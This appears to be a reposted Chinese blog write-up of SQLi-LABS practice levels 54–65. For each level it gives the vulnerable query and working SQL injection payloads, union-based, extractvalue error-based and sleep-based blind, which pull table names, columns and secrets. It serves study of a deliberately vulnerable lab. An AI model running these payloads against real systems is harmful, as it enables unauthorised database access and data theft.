2. 程式人生 > 其它 >SQLi-LABS靶場Less-54~65解題記錄

SQLi-LABS靶場Less-54~65解題記錄

阿新 發佈:2022-04-10

刷題

Page4

Less-54(GET - challenge - Union- 10 queries allowed - Variation 1)

GET - challenge - union - 允許10次查詢 - 變種1

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

這一關依舊是字元型注入,但是隻能嘗試十次。

這裡的表名和密碼等是每十次嘗試後就強制進行更換。
因為已經知道了資料庫名字叫做 challenges,所以我們需要知道表名。

暴庫:

?id=-1' union select 1,2,database() --+

challenges

爆表:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

8aklv5t3d6

暴列:

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='8aklv5t3d6' --+

猜測secret_2YSJ是key

暴值:

?id=-1' union select 1,2,group_concat(secret_2YSJ) from challenges.8aklv5t3d6 --+

Less-55(GET - challenge - Union- 1 4 queries allowed - Variation 2)

GET - challenge - union - 允許14次查詢 - 變種2

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

思路同上54 ,只不過多一個括號?id=0) 次數為14次

爆表:

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

gbk3yw2slw

暴列:

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+

secret_ECLS

暴值:

?id=-1) union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+

Less-56(GET - challenge - Union- 1 4 queries allowed - variation 3)

GET - challenge - union - 允許14次查詢 - 變種3

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

思路同上54,55。只不過多一個單引號和括號?id=0’) 次數為14次

爆表:

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

gbk3yw2slw

暴列:

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+

secret_ECLS

暴值:

?id=-1') union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+

Less-57(GET - challenge - Union- 14 queries allowed - Variation 4)

GET - challenge - union - 允許14次查詢 - 變種4

$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

思路同上,只不過 id=”.$id.” 這裡進行了雙引號閉合

爆表:

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

暴列:

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+

暴值:

?id=-1" union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+

Less-58(GET - challenge - Double Query- 5 queries allowed - Variation l)

GET - challenge - 雙注入 - 允許5次查詢 - 變種1

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

執行sql 語句後,並沒有返回資料庫當中的資料,所以我們這裡不能使用 union 聯合注入,這裡使用報錯注入。

爆表:

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

na84sqpzf1

暴列:

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='na84sqpzf1'))) --+

secret_H21F

暴值:

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_H21F) from na84sqpzf1))) --+

yCeBdWLEcQBb9swXSgwxGsKf

Less-59(GET - challenge - Double Query- 5 queries allowed - Variation 2)

GET - challenge - 雙注入 - 允許5次查詢 - 變種2

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

同58,只不過沒有單引號

爆表:

?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

ir2kngnqlg

暴列:

?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ir2kngnqlg'))) --+

secret_VFU4

暴值:

?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(secret_VFU4) from ir2kngnqlg))) --+

FgW73MnkRN6zQFoMJF8lB2hx

Less-60(GET - challenge - Double Query- 5 queries allowed - Variation 3)

GET - challenge - 雙注入 - 允許5次查詢 - 變種3

$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

同59,只不過多了雙引號和括號?id=-1")

爆表:

?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

qwo4md2ykm

暴列:

?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='qwo4md2ykm'))) --+

secret_PIER

暴值:

?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(secret_PIER) from qwo4md2ykm))) --+

5dbmmA4u4BmYhuqSnUvW7VzR

Less-61(GET - challenge - Double Query- 5 queries allowed - Variation 4)

GET - challenge - 雙注入 - 允許5次查詢 - 變種4

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

同上,只不過多了兩個括號和一個雙引號?id=-1'))

爆表:

?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

aakl60y1i1

暴列:

?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='aakl60y1i1'))) --+

secret_VHWW

暴值:

?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_VHWW) from aakl60y1i1))) --+

bGSX0wP4UeitlxG5b6BRtzMe

Less-62(GET - challenge - Blind - 130 queries allowed - variation 1)

GET - challenge - 盲注 - 允許130次查詢 - 變種1

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

此處union和報錯注入都已經失效了,那我們就要使用延時注入了。

?id=1’)and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),1,1))=79,0,sleep(10))–+

當正確的時候時間很短,當錯誤的時候時間大於 10 秒,此時可以利用指令碼進行嘗試。

首先要知道該資料庫下有幾張表。
通過

?id=1') and if((select count(*) from information_schema.tables where table_schema=database())=1,sleep(5),1) --+

可以判斷出,chllanges表下面只有一張表。

判斷表名長度,表名

?id=1') and if(length((select table_name from information_schema.tables where table_schema=database()))=10,sleep(5),1) --+

判斷出表名的長度為10。

?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))=54,sleep(5),1) --+

通過此語句判斷出來,表名的第一個字母的ascii碼為54,對應的字元為6.

判斷列

select count(*) from information_schema.tables where table_schema=database() and table_name="69qpriqcgb"

同理,利用以上語句判斷出69qpriqcgb表中(此表明是隨機生成的),有4個欄位。

select column_name from information_schema.columns where table_schema=database() and table_name="69qpriqcgb" limit 0,1

Less-63(GET - challenge - Blind - 130 queries allowed - variation 2)

GET - challenge - 盲注 - 允許130次查詢 - 變種2

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

同上62,只不過是單引號

payload:?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))–+

正確時間短,錯誤時間長

Less-64(GET - challenge - Blind - 130 queries allowed - variation 3)

GET - challenge - 盲注 - 允許130次查詢 - 變種3

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

同上63,只不過是雙括號

payload:?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))–+

正確時間短,錯誤時間長

Less-65(GET - challenge - Blind - 130 queries allowed - variation 4)

GET - challenge - 盲注 - 允許130次查詢 - 變種4

$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

同上,只不過?id=1”)

payload:?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+

相關推薦

SQLi-LABS靶場Less-54~65解題記錄

刷題 Page4 Less-54(GET - challenge - Union- 10 queries allowed - Variation 1) GET - challenge - union - 允許10次查詢 - 變種1

SQLi-LABS靶場Less-38~53解題記錄

刷題 Page3 Less-38(GET- Stacked Query Injection - String) GET - 堆疊查詢注入 - 字串 堆疊注入,實際上就構成了兩條SQL語句

sqli-labs刷題(54-65)

54 無報錯 無過濾 union ID:1 ID:1\' ID:1\'-- ID:0\' union select 1,2,3-- ID:0\' union select 1,2,database()--

SQL注入 - SQLi-Labs靶場過關記錄

Less-1 1、看報錯型別,確定注入點     ?id=1\' order by 4--++ 2、確定資料庫     ?id=-1\' union select 1,2,3--++

SQLI-LABS靶場環境搭建詳細流程

準備工作 需要虛擬機器一臺: 我用的是Win2008R2企業版 Web容器: phpstudy2016 額外需要安裝VC9_x86 32位 為了配合phpstudy2016版本中版本較低的php環境, 所以需要提前安裝好32位的VC9

sqli-labs通關Less 1-4

sqli-labs通關Less 1-4 實驗工具:phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意:sqli-labs-master配置正確的情況下,建立實驗資料庫出錯,可能是由於php版本造成,可試著更改其版本

sqli-labs靶場11-12關(基於POST聯合查詢)

1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那麼這裡是典型的POST注入,那麼注入點就是在POST資料中,而POST請求往往代表著使用者向伺服器提交了大量的資料請求,行為有包括檔案上傳,

sqli-labs靶場第十五關

第十五關沒什麼特殊的,只是單引號閉合而已。

1. sqli-labs學習 less-01

0x00 過程 新增id引數,回寫正常 payload:http://127.0.0.1/sqli_labs/Less-1/?id=1 尋找注入點

sqli labsLess-1至Less-10)

網安興趣愛好者,初次分享學習筆記。 Less-1 型別 字元型回顯注入\' 輸入點 根據新增\'頁面的回顯,可以判斷出\'是閉合

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19 方

sqli-labs 通關指南:Less 27、28

Less 27 和 Less 28 都涉及到了對 “SELECT” 和 “UNION” 的過濾,根據情況我們可以採用大小寫過濾或者用其他編碼打亂過濾的句式。

sqli-labs 通關指南:Less 29、30、31

Less 29、30、31 都使用了 WAF 進行引數過濾,此處我們需要對 WAF 進行繞過再進行注入。可以使用 HPP 引數汙染攻擊,繞過 WAF 之後的注入過程和 Less 1 一樣。

sqli-labs 通關指南:Less 38 ~ 41

Less 38 ~ 41 雖然使用 Less 1 的方式注入即可注入成功,但是這 4 關存在堆疊注入漏洞。我們可以使用 “;” 閉合第一個 SQL 語句,然後在後面執行任意的 SQL 語句,通過這個漏洞我們可以對資料庫執行任意的操作。

sqli-labs less-8(布林盲注)

less-8 布林盲注 首先利用?id=1\' and 1=1 --+和?id=1\' and 1=2 --+確定id的型別為單引號\'\'包裹。然後進行盲注。

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

less-10 in sqli-labs

Less-10 延遲注入[ ” ] 先進行注入點的測試,發現試過很多回顯都是一樣的,當嘗試到?id=1\" and sleep(5) --+,發現頁面在遲緩後有回顯,猜測是基於\"的時間盲注,盲註腳本和less-9基本一樣,改下url就行。

sqli-labs less 6

技術標籤:sqli-labsmysql安全 一、輸入id,回顯正常 127.0.0.1/sqli-labs-master/Less-6/?id=1

sqli-labs less 13

13關的話也沒有什麼特殊的,和十二關的順序啊payload啊一模一樣,不過13關的閉合方式是’),所以直接參考12就好了 12連結: